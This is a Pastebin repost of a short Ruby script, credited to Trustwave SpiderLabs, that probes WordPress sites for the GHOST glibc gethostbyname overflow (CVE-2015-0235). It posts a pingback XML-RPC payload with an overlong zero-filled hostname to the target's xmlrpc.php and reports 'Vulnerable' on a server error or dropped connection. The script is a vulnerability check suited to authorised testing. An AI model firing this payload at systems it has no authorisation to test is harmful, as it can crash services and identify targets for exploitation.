API tools faq
paste
Advertisement
Googleinurl

GHOST gethostbyname() Vuln (CVE-2015-0235)

Googleinurl
Mar 15th, 2015
1,069
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 1.14 KB | None | 0 0
raw download clone embed print report
  1. #
  2. # --[ Trustwave SpiderLabs Research Team ]--
  3. # Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
  4. #
  5. require "net/http"
  6. require "uri"
  7.  
  8. if ARGV.count != 2
  9.   puts "Usage: #{ARGV[0]} [Target URL] [count]"
  10.   exit
  11. end
  12.  
  13. matched = ARGV[0].match(/(?<domain>[^\/]*)(?<path>\/.*)(\/xmlrpc.php)?/)
  14. uri = URI.parse("http://#{matched[:domain]}")
  15. ghost_host = "0"*ARGV[1].to_i
  16.  
  17. # Set up POST request
  18. payload = <<_EOF_
  19. <?xml version="1.0"?>
  20.   <methodCall>
  21.     <methodName>pingback.ping</methodName>
  22.     <params><param><value>
  23.           <string>http://#{ghost_host}/index.php</string>
  24.     </value></param>
  25.     <param><value>
  26.       <string>http://#{ghost_host}/index.php</string>
  27.     </value></param>
  28.     </params>
  29.   </methodCall>
  30. _EOF_
  31.  
  32. begin
  33.   Net::HTTP.start(uri.host, uri.port) do |http|
  34.     response = http.post("#{matched[:path]}/xmlrpc.php", payload)
  35.     if response.code == "500"
  36.       puts "Vulnerable"
  37.     else
  38.       puts "Looks like you're safe, for today"
  39.     end
  40.   end
  41. rescue EOFError
  42.   puts "Vulnerable"
  43. end
  44. #source : https://gist.github.com/rcbarnett/7564bee9f81aba746e04
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!